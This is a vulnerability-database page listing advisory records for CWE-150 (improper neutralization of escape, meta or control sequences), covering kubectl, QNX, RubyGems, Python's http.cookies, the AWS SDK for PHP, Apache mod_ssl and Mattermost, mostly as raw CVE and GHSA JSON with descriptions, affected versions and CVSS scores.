CWE-150
AllowedImproper Neutralization of Escape, Meta, or Control Sequences
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.
115 vulnerabilities reference this CWE, most recent first.
CVE-2021-25743 (GCVE-0-2021-25743)
Vulnerability from cvelistv5 – Published: 2022-01-07 00:00 – Updated: 2024-09-16 23:51- CWE-150 - Improper Neutralization of Escape, Meta, or Control Sequences
| URL | Tags |
|---|---|
| https://github.com/kubernetes/kubernetes/issues/101695 | x_refsource_MISC |
| https://security.netapp.com/advisory/ntap-2022021… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Kubernetes | Kubernetes |
Affected:
unspecified , ≤ 1.23.1
(custom)
Unknown: next of 1.23.1 , < unspecified (custom) Affected: unspecified , ≤ 1.22.5 (custom) Unknown: next of 1.22.5 , < unspecified (custom) Affected: unspecified , ≤ 1.21.8 (custom) Unknown: next of 1.21.8 , < unspecified (custom) Affected: unspecified , ≤ 1.20.14 (custom) Unknown: next of 1.20.14 , < unspecified (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:11:27.596Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/kubernetes/kubernetes/issues/101695"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220217-0003/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Kubernetes",
"vendor": "Kubernetes",
"versions": [
{
"lessThanOrEqual": "1.23.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
},
{
"lessThan": "unspecified",
"status": "unknown",
"version": "next of 1.23.1",
"versionType": "custom"
},
{
"lessThanOrEqual": "1.22.5",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
},
{
"lessThan": "unspecified",
"status": "unknown",
"version": "next of 1.22.5",
"versionType": "custom"
},
{
"lessThanOrEqual": "1.21.8",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
},
{
"lessThan": "unspecified",
"status": "unknown",
"version": "next of 1.21.8",
"versionType": "custom"
},
{
"lessThanOrEqual": "1.20.14",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
},
{
"lessThan": "unspecified",
"status": "unknown",
"version": "next of 1.20.14",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Eviatar Gerzi"
}
],
"datePublic": "2021-05-02T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-150",
"description": "CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-02-17T17:06:37.000Z",
"orgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"shortName": "kubernetes"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubernetes/kubernetes/issues/101695"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20220217-0003/"
}
],
"source": {
"defect": [
"https://github.com/kubernetes/kubernetes/issues/101695"
],
"discovery": "EXTERNAL"
},
"title": "ANSI escape characters in kubectl output are not being filtered",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@kubernetes.io",
"DATE_PUBLIC": "2021-05-02T12:06:00.000Z",
"ID": "CVE-2021-25743",
"STATE": "PUBLIC",
"TITLE": "ANSI escape characters in kubectl output are not being filtered"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Kubernetes",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_value": "1.23.1"
},
{
"version_affected": "?\u003e",
"version_value": "1.23.1"
},
{
"version_affected": "\u003c=",
"version_value": "1.22.5"
},
{
"version_affected": "?\u003e",
"version_value": "1.22.5"
},
{
"version_affected": "\u003c=",
"version_value": "1.21.8"
},
{
"version_affected": "?\u003e",
"version_value": "1.21.8"
},
{
"version_affected": "\u003c=",
"version_value": "1.20.14"
},
{
"version_affected": "?\u003e",
"version_value": "1.20.14"
}
]
}
}
]
},
"vendor_name": "Kubernetes"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Eviatar Gerzi"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kubernetes/kubernetes/issues/101695",
"refsource": "MISC",
"url": "https://github.com/kubernetes/kubernetes/issues/101695"
},
{
"name": "https://security.netapp.com/advisory/ntap-20220217-0003/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20220217-0003/"
}
]
},
"source": {
"defect": [
"https://github.com/kubernetes/kubernetes/issues/101695"
],
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"assignerShortName": "kubernetes",
"cveId": "CVE-2021-25743",
"datePublished": "2022-01-07T00:00:12.399Z",
"dateReserved": "2021-01-21T00:00:00.000Z",
"dateUpdated": "2024-09-16T23:51:24.348Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-6932 (GCVE-0-2020-6932)
Vulnerability from cvelistv5 – Published: 2020-08-12 12:21 – Updated: 2025-08-22 15:16- CWE-150 - Improper Neutralization of Escape, Meta, or Control Sequences
| URL | Tags |
|---|---|
| http://support.blackberry.com/kb/articleDetail?ar… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| BlackBerry | QNX Software Development Platform (SDP) |
Affected:
6.4.0 , ≤ 6.6.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T09:18:01.477Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://support.blackberry.com/kb/articleDetail?articleNumber=000061411"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "QNX Software Development Platform (SDP)",
"vendor": "BlackBerry",
"versions": [
{
"lessThanOrEqual": "6.6.0",
"status": "affected",
"version": "6.4.0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eAn information disclosure and remote code execution vulnerability in the slinger web server of the BlackBerry QNX Software Development Platform versions 6.4.0 to 6.6.0 could allow an attacker to potentially read arbitrary files and run arbitrary executables in the context of the web server.\u003c/p\u003e"
}
],
"value": "An information disclosure and remote code execution vulnerability in the slinger web server of the BlackBerry QNX Software Development Platform versions 6.4.0 to 6.6.0 could allow an attacker to potentially read arbitrary files and run arbitrary executables in the context of the web server."
}
],
"impacts": [
{
"capecId": "CAPEC-64",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-64 Using Slashes and URL Encoding Combined to Bypass Validation Logic"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-150",
"description": "CWE-150 Improper Neutralization of Escape, Meta, or Control Sequences",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T15:16:18.943Z",
"orgId": "dbe78b00-5e7b-4fda-8748-329789ecfc5c",
"shortName": "blackberry"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://support.blackberry.com/kb/articleDetail?articleNumber=000061411"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secure@blackberry.com",
"ID": "CVE-2020-6932",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An information disclosure and remote code execution vulnerability in the slinger web server of the BlackBerry QNX Software Development Platform versions 6.4.0 to 6.6.0 could allow an attacker to potentially read arbitrary files and run arbitrary executables in the context of the web server."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://support.blackberry.com/kb/articleDetail?articleNumber=000061411",
"refsource": "MISC",
"url": "http://support.blackberry.com/kb/articleDetail?articleNumber=000061411"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "dbe78b00-5e7b-4fda-8748-329789ecfc5c",
"assignerShortName": "blackberry",
"cveId": "CVE-2020-6932",
"datePublished": "2020-08-12T12:21:32.000Z",
"dateReserved": "2020-01-13T00:00:00.000Z",
"dateUpdated": "2025-08-22T15:16:18.943Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-0899 (GCVE-0-2017-0899)
Vulnerability from cvelistv5 – Published: 2017-08-31 20:00 – Updated: 2024-09-17 02:20- CWE-150 - Improper Neutralization of Escape, Meta, or Control Sequences (CWE-150)
| URL | Tags |
|---|---|
| https://access.redhat.com/errata/RHSA-2018:0585 | vendor-advisoryx_refsource_REDHAT |
| https://www.debian.org/security/2017/dsa-3966 | vendor-advisoryx_refsource_DEBIAN |
| https://access.redhat.com/errata/RHSA-2018:0378 | vendor-advisoryx_refsource_REDHAT |
| https://hackerone.com/reports/226335 | x_refsource_MISC |
| http://www.securitytracker.com/id/1039249 | vdb-entryx_refsource_SECTRACK |
| https://github.com/rubygems/rubygems/commit/1bcbc… | x_refsource_MISC |
| https://github.com/rubygems/rubygems/commit/ef0aa… | x_refsource_MISC |
| https://access.redhat.com/errata/RHSA-2017:3485 | vendor-advisoryx_refsource_REDHAT |
| https://lists.debian.org/debian-lts-announce/2018… | mailing-listx_refsource_MLIST |
| https://access.redhat.com/errata/RHSA-2018:0583 | vendor-advisoryx_refsource_REDHAT |
| https://security.gentoo.org/glsa/201710-01 | vendor-advisoryx_refsource_GENTOO |
| http://www.securityfocus.com/bid/100576 | vdb-entryx_refsource_BID |
| http://blog.rubygems.org/2017/08/27/2.6.13-releas… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T13:25:16.395Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2018:0585",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0585"
},
{
"name": "DSA-3966",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2017/dsa-3966"
},
{
"name": "RHSA-2018:0378",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0378"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/226335"
},
{
"name": "1039249",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1039249"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/rubygems/rubygems/commit/1bcbc7fe637b03145401ec9c094066285934a7f1"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/rubygems/rubygems/commit/ef0aa611effb5f54d40c7fba6e8235eb43c5a491"
},
{
"name": "RHSA-2017:3485",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2017:3485"
},
{
"name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1421-1] ruby2.1 security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html"
},
{
"name": "RHSA-2018:0583",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0583"
},
{
"name": "GLSA-201710-01",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/201710-01"
},
{
"name": "100576",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/100576"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://blog.rubygems.org/2017/08/27/2.6.13-released.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "RubyGems",
"vendor": "HackerOne",
"versions": [
{
"status": "affected",
"version": "Versions before 2.6.13"
}
]
}
],
"datePublic": "2017-08-27T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-150",
"description": "Improper Neutralization of Escape, Meta, or Control Sequences (CWE-150)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-07-14T09:57:01.000Z",
"orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"shortName": "hackerone"
},
"references": [
{
"name": "RHSA-2018:0585",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0585"
},
{
"name": "DSA-3966",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2017/dsa-3966"
},
{
"name": "RHSA-2018:0378",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0378"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/226335"
},
{
"name": "1039249",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1039249"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rubygems/rubygems/commit/1bcbc7fe637b03145401ec9c094066285934a7f1"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rubygems/rubygems/commit/ef0aa611effb5f54d40c7fba6e8235eb43c5a491"
},
{
"name": "RHSA-2017:3485",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2017:3485"
},
{
"name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1421-1] ruby2.1 security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html"
},
{
"name": "RHSA-2018:0583",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0583"
},
{
"name": "GLSA-201710-01",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "https://security.gentoo.org/glsa/201710-01"
},
{
"name": "100576",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/100576"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://blog.rubygems.org/2017/08/27/2.6.13-released.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "support@hackerone.com",
"DATE_PUBLIC": "2017-08-27T00:00:00",
"ID": "CVE-2017-0899",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "RubyGems",
"version": {
"version_data": [
{
"version_value": "Versions before 2.6.13"
}
]
}
}
]
},
"vendor_name": "HackerOne"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Improper Neutralization of Escape, Meta, or Control Sequences (CWE-150)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "RHSA-2018:0585",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0585"
},
{
"name": "DSA-3966",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2017/dsa-3966"
},
{
"name": "RHSA-2018:0378",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0378"
},
{
"name": "https://hackerone.com/reports/226335",
"refsource": "MISC",
"url": "https://hackerone.com/reports/226335"
},
{
"name": "1039249",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1039249"
},
{
"name": "https://github.com/rubygems/rubygems/commit/1bcbc7fe637b03145401ec9c094066285934a7f1",
"refsource": "MISC",
"url": "https://github.com/rubygems/rubygems/commit/1bcbc7fe637b03145401ec9c094066285934a7f1"
},
{
"name": "https://github.com/rubygems/rubygems/commit/ef0aa611effb5f54d40c7fba6e8235eb43c5a491",
"refsource": "MISC",
"url": "https://github.com/rubygems/rubygems/commit/ef0aa611effb5f54d40c7fba6e8235eb43c5a491"
},
{
"name": "RHSA-2017:3485",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2017:3485"
},
{
"name": "[debian-lts-announce] 20180714 [SECURITY] [DLA 1421-1] ruby2.1 security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html"
},
{
"name": "RHSA-2018:0583",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0583"
},
{
"name": "GLSA-201710-01",
"refsource": "GENTOO",
"url": "https://security.gentoo.org/glsa/201710-01"
},
{
"name": "100576",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/100576"
},
{
"name": "http://blog.rubygems.org/2017/08/27/2.6.13-released.html",
"refsource": "MISC",
"url": "http://blog.rubygems.org/2017/08/27/2.6.13-released.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"assignerShortName": "hackerone",
"cveId": "CVE-2017-0899",
"datePublished": "2017-08-31T20:00:00.000Z",
"dateReserved": "2016-11-30T00:00:00.000Z",
"dateUpdated": "2024-09-17T02:20:54.846Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-2755-2MM4-RM5C
Vulnerability from github – Published: 2026-04-22 21:32 – Updated: 2026-05-18 18:31http.cookies.Morsel.js_output() returns an inline snippet and only escapes " for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.
{
"affected": [],
"aliases": [
"CVE-2026-6019"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-150"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-22T20:16:42Z",
"severity": "LOW"
},
"details": "http.cookies.Morsel.js_output() returns an inline \u003cscript\u003e snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence \u003c/script\u003e inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
"id": "GHSA-2755-2mm4-rm5c",
"modified": "2026-05-18T18:31:23Z",
"published": "2026-04-22T21:32:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/issues/90309"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/pull/148848"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
},
{
"type": "WEB",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-27QH-8CXX-2CR5
Vulnerability from github – Published: 2026-03-27 19:54 – Updated: 2026-03-27 19:54Summary
This notification is related to the CloudFront signing utilities in the AWS SDK for PHP, which are used to generate Amazon CloudFront signed URLs and signed cookies. A defense-in-depth enhancement has been implemented to improve handling of special characters, such as double quotes and backslashes, in input values.
Impact
The CloudFront signing utilities build policy documents that define access restrictions for signed URLs and cookies. If an application passes unsanitized input containing special characters to these utilities, the resulting policy document may not reflect the application's intended access restrictions. While the SDK was functioning safely within the requirements of the shared responsibility model, additional safeguards have been added to support secure customer implementations. Applications that already follow AWS security best practices for input validation are not impacted.
Impacted versions: 3.11.7 - 3.371.3
Patches
On 3/3/2026, an enhancement was made to the AWS SDK for PHP version 3.371.4. The enhancement ensures that special characters in input values are correctly handled. It is recommended to upgrade to the latest version.
Workarounds
No workarounds are needed, but customers should ensure that the application is following security best practices:
- Implement proper input validation in application code before passing values to CloudFront signing utilities
- Update to the latest AWS SDK release on a regular basis
- Follow AWS security best practices for SDK configuration
References
For any questions or comments about this advisory, it is recommended to contact AWS Security via the vulnerability reporting page or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
Acknowledgement
The Amazon Inspector Security Research team is thanked for identifying this issue and working through the coordinated process.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.371.3"
},
"package": {
"ecosystem": "Packagist",
"name": "aws/aws-sdk-php"
},
"ranges": [
{
"events": [
{
"introduced": "3.11.7"
},
{
"fixed": "3.371.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-150",
"CWE-20",
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T19:54:58Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThis notification is related to the [CloudFront signing utilities](https://github.com/aws/aws-sdk-php/blob/master/src/CloudFront/Signer.php) in the AWS SDK for PHP, which are used to generate Amazon CloudFront signed URLs and signed cookies. A defense-in-depth enhancement has been implemented to improve handling of special characters, such as double quotes and backslashes, in input values.\n\n### Impact\n\nThe CloudFront signing utilities build policy documents that define access restrictions for signed URLs and cookies. If an application passes unsanitized input containing special characters to these utilities, the resulting policy document may not reflect the application\u0027s intended access restrictions. While the SDK was functioning safely within the requirements of the shared responsibility model, additional safeguards have been added to support secure customer implementations. Applications that already follow AWS security best practices for input validation are not impacted.\n\n### Impacted versions: 3.11.7 - 3.371.3\n\n### Patches\n\nOn 3/3/2026, an enhancement was made to the AWS SDK for PHP version 3.371.4. The enhancement ensures that special characters in input values are correctly handled. It is recommended to upgrade to the latest version.\n\n### Workarounds\n\nNo workarounds are needed, but customers should ensure that the application is following security best practices:\n\n- Implement proper input validation in application code before passing values to CloudFront signing utilities\n- Update to the latest AWS SDK release on a regular basis\n- Follow AWS security best practices for SDK configuration\n\n### References\n\nFor any questions or comments about this advisory, it is recommended to contact AWS Security via the [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n### Acknowledgement\n\nThe Amazon Inspector Security Research team is thanked for identifying this issue and working through the coordinated process.",
"id": "GHSA-27qh-8cxx-2cr5",
"modified": "2026-03-27T19:54:59Z",
"published": "2026-03-27T19:54:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/aws-sdk-php/security/advisories/GHSA-27qh-8cxx-2cr5"
},
{
"type": "PACKAGE",
"url": "https://github.com/aws/aws-sdk-php"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-sdk-php/blob/master/src/CloudFront/Signer.php"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-sdk-php/releases/tag/3.371.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "AWS SDK for PHP has CloudFront Policy Document Injection via Special Characters"
}
GHSA-2QFR-Q5V6-M43Q
Vulnerability from github – Published: 2025-07-10 18:31 – Updated: 2025-11-05 00:31Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations.
In a logging configuration where CustomLog is used with "%{varname}x" or "%{varname}c" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.
{
"affected": [],
"aliases": [
"CVE-2024-47252"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-10T17:15:46Z",
"severity": "HIGH"
},
"details": "Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations.\n\nIn a logging configuration where CustomLog is used with \"%{varname}x\" or \"%{varname}c\" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.",
"id": "GHSA-2qfr-q5v6-m43q",
"modified": "2025-11-05T00:31:20Z",
"published": "2025-07-10T18:31:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47252"
},
{
"type": "WEB",
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00009.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/07/10/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/07/10/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3439-VQGJ-2GCF
Vulnerability from github – Published: 2026-03-26 18:31 – Updated: 2026-03-31 23:02Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking. Mattermost Advisory ID: MMSA-2026-00599.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "11.4.0-rc1"
},
{
"fixed": "11.4.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
